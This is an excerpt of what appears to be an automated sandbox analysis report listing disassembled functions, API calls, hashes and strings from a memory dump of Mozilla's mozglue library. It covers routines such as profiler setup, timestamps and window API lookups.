                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8C3A
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8C74
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C8E1563), ref: 6C8C8CBA
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C8CCF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2153970598-0
                                                                                                                                                                                                                      • Opcode ID: 7c86531d78f9bc353fac12ca05ae7e562fa1eed09de61971fb922ee51040c158
                                                                                                                                                                                                                      • Instruction ID: 7b42df55266308ef852df1815abc2169c9989f2097d3826180857e45c0c984b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c86531d78f9bc353fac12ca05ae7e562fa1eed09de61971fb922ee51040c158
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93718D75A04B00CFD714CF29C58062AB7F1FF99314F168A6EE9899B722E770E884CB41
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C88F2B4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 6C88F2F0
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C88F308
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C88F36B
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C88F371
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1171715205-0
                                                                                                                                                                                                                      • Opcode ID: b8965c1c8175b2f4c593b2a6931606cda7b3dc82fdad7aa9222569e1a10795ce
                                                                                                                                                                                                                      • Instruction ID: d62ea717ac4be5c2b33a83fb77b60fcf0da8b711df5caca9a5d616ba3e58cf2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8965c1c8175b2f4c593b2a6931606cda7b3dc82fdad7aa9222569e1a10795ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D521A530A02308DBEB309A55CE44BEF76B8EB5435CF144A39E62097EC0E7749A88C761
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8F8A4B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                      • Instruction ID: 284b206f543623060ad567e619b8f6b25b7710b830d605ac9447c3e566482e25
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92B1E772E0021A8FDB24CF68CDD07A9B7B2EF95314F1906B9C599DB781D7309986CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8F88F0
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C8F925C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                      • Instruction ID: 76af4efa89248919f40836c68400e57a2e9022ca8da87a0a3e8d5c14de83f10d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1D572E0020ACFCB24CE58CD806EDB7B2EF95314F144679C959EB785D730A99ACB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C8F8E18
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C8F925C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                                                                                      • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                      • Instruction ID: 80f9c9e2f15dd7ad1918b8c15c76799a99bc766d202c9895264da40e0e433dab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80A11872E0020A8FCB24CE58CD8079DB7B2EF95314F1546B9C959DB745D730A98ACB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8D7A81
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8D7A93
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: GetTickCount64.KERNEL32 ref: 6C8A5D40
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A5D67
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8D7AA1
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: __aulldiv.LIBCMT ref: 6C8A5DB4
                                                                                                                                                                                                                        • Part of subcall function 6C8A5C50: LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A5DED
                                                                                                                                                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C8D7B31
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4054851604-0
                                                                                                                                                                                                                      • Opcode ID: 51b3b36923208db080715708c1ca84b8d2369655afe41d6a21d32d08962be0ac
                                                                                                                                                                                                                      • Instruction ID: 301d78a5fa2cbfe39bd0421b3539bab866aad26f2c4cd51ecab6384e495de2d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51b3b36923208db080715708c1ca84b8d2369655afe41d6a21d32d08962be0ac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85B19D357087908BDB24CF28C25065FB7E2ABC5318F164E2CE99567795DB70F90ACB82
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB720
                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C8EB75A
                                                                                                                                                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C8BFE3F,00000000,00000000,?,?,00000000,?,6C8BFE3F), ref: 6C8EB760
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 304294125-0
                                                                                                                                                                                                                      • Opcode ID: fbe1f160c2529e2bc410fe38eac0b31f4f4b09f8a32aceb6c27f47a04926fc09
                                                                                                                                                                                                                      • Instruction ID: e9984427832517c79aa8700bfc9c1f280a55196b192d2d61d2f9c5bdfcb23584
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbe1f160c2529e2bc410fe38eac0b31f4f4b09f8a32aceb6c27f47a04926fc09
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F0A470A0430CAFEF219AE68D84BEF77BC9B0A329F105639D611619C0D77496D8C664
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C8903D4,?), ref: 6C8EB955
                                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C8EB9A5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889792194-0
                                                                                                                                                                                                                      • Opcode ID: 5e423ad1129681dd0a914ad0fc0786e103c67d01708aa755a685cc9f1003c678
                                                                                                                                                                                                                      • Instruction ID: 193ec9b0eb2afc4fc1fe7b03c05c19e13b302773ecf6240fa1533a7d89b934cd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e423ad1129681dd0a914ad0fc0786e103c67d01708aa755a685cc9f1003c678
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41D431F013199FDF24CFA8E980AEEB7B5EF89354F148539E905A7704DB30A9458B94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(user32,?,6C8BE1A5), ref: 6C8E5606
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6C8BE1A5), ref: 6C8E560F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C8E5633
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C8E563D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C8E566C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C8E567D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C8E5696
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C8E56B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C8E56CB
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C8E56E4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C8E56FD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C8E5716
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C8E572F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C8E5748
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C8E5761
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C8E577A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C8E5793
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C8E57A8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C8E57BD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C8E57D5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C8E57EA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C8E57FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                      • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                      • Opcode ID: 82fac6180dac9d7c5d8c56174522cbc6528d58dd2a96a259b84ae219aeaefb00
                                                                                                                                                                                                                      • Instruction ID: b3514e4421bb70c7bdda3f33b7e018f023e7968a447e3995da059c78bd0052ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82fac6180dac9d7c5d8c56174522cbc6528d58dd2a96a259b84ae219aeaefb00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0514671719722ABDB109F358F4493B3BF8AB4B789730482DA961E2B51EB70C901CF64
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C89582D), ref: 6C8CCC27
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C89582D), ref: 6C8CCC3D
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C8FFE98,?,?,?,?,?,6C89582D), ref: 6C8CCC56
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC6C
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC82
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCC98
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C89582D), ref: 6C8CCCAE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C8CCCC4
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C8CCCDA
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C8CCCEC
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C8CCCFE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C8CCD14
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C8CCD82
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C8CCD98
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C8CCDAE
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C8CCDC4
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C8CCDDA
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C8CCDF0
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C8CCE06
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C8CCE1C
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C8CCE32
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C8CCE48
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C8CCE5E
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C8CCE74
                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C8CCE8A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                                                      • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                      • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                      • Opcode ID: 1d7901c0411220ae8e5042d8cd15e0551847027d7662ab4d010488df4e982d01
                                                                                                                                                                                                                      • Instruction ID: 8ef04c9f00f3b68856d7c4cfe5af0cf4139a7a402d9cc9cbabc68e675185a3f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d7901c0411220ae8e5042d8cd15e0551847027d7662ab4d010488df4e982d01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35515491B0522951FA3433196F10BAA1445EB533CBF144C3EEA25A1F83FB49D74A86B7
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C894801
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C894817
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C89482D
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89484A
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB3F: EnterCriticalSection.KERNEL32(6C90E370,?,?,6C883527,6C90F6CC,?,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB49
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB3F: LeaveCriticalSection.KERNEL32(6C90E370,?,6C883527,6C90F6CC,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BAB7C
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89485F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C89487E
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89488B
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C89493A
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C894956
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C894960
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C89499A
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8949C6
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8949E9
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C894812
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8947FC
                                                                                                                                                                                                                      • [I %d/%d] profiler_shutdown, xrefs: 6C894A06
                                                                                                                                                                                                                      • MOZ_PROFILER_SHUTDOWN, xrefs: 6C894A42
                                                                                                                                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C894828
